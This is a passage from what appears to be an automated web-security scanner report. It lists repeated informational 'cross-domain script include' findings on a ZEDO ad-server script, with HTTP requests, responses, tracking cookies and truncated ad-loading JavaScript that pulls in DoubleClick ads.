The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.3112159612461934 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=29:29:27:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=28:29:29:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=89
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:52 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=28%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=28%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.112. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.49883930598955767 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=57:68:58:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=59:57:68:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Sun, 24 Apr 2011 16:53:38 GMT
Date: Sun, 24 Apr 2011 16:51:15 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=59%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=59%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.113. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9592094383110872 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=31:31:30:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=31:31:31:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=78
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:03 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=31%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=31%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.114. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8933249285461247 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=22:20:19:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:28 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=20:22:20:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=113
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:28 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.33;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929078%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=20%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=20%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.115. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.7047339260035059 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=4:5:3:None; FFCap=1574B809,210132,210841,210128,204732|2,1,1:1,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731|2,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:09 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:4:3:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:09 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.10;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911254%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=6%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=6%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.116. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.6899598540329261 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=42:46:42:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:1,1,1;expires=Tue, 24 May 2011 16:49:52 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=43:42:46:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:49:52 GMT
Connection: close
Content-Length: 2093

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.30;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929081%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=43%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=43%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.117. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.26812006831627966 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=52:63:53:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=54:52:63:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=160
Expires: Sun, 24 Apr 2011 16:53:39 GMT
Date: Sun, 24 Apr 2011 16:50:59 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=54%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=54%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.118. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5766728212914168 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFad=0:1:1:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132|0,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732|0,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:46:13 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:0:1:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=248
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:13 GMT
Connection: close
Content-Length: 2121

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9;sz=300x250;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911256%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=2%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=2%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.119. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9108989179005873 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=13:14:12:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1;expires=Tue, 24 May 2011 16:48:02 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=14:14:12:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:02 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=14%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=14%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.120. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.18531027677477674 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=14:15:14:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:05 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=16:14:14:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=137
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:48:05 GMT
Connection: close
Content-Length: 2152

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
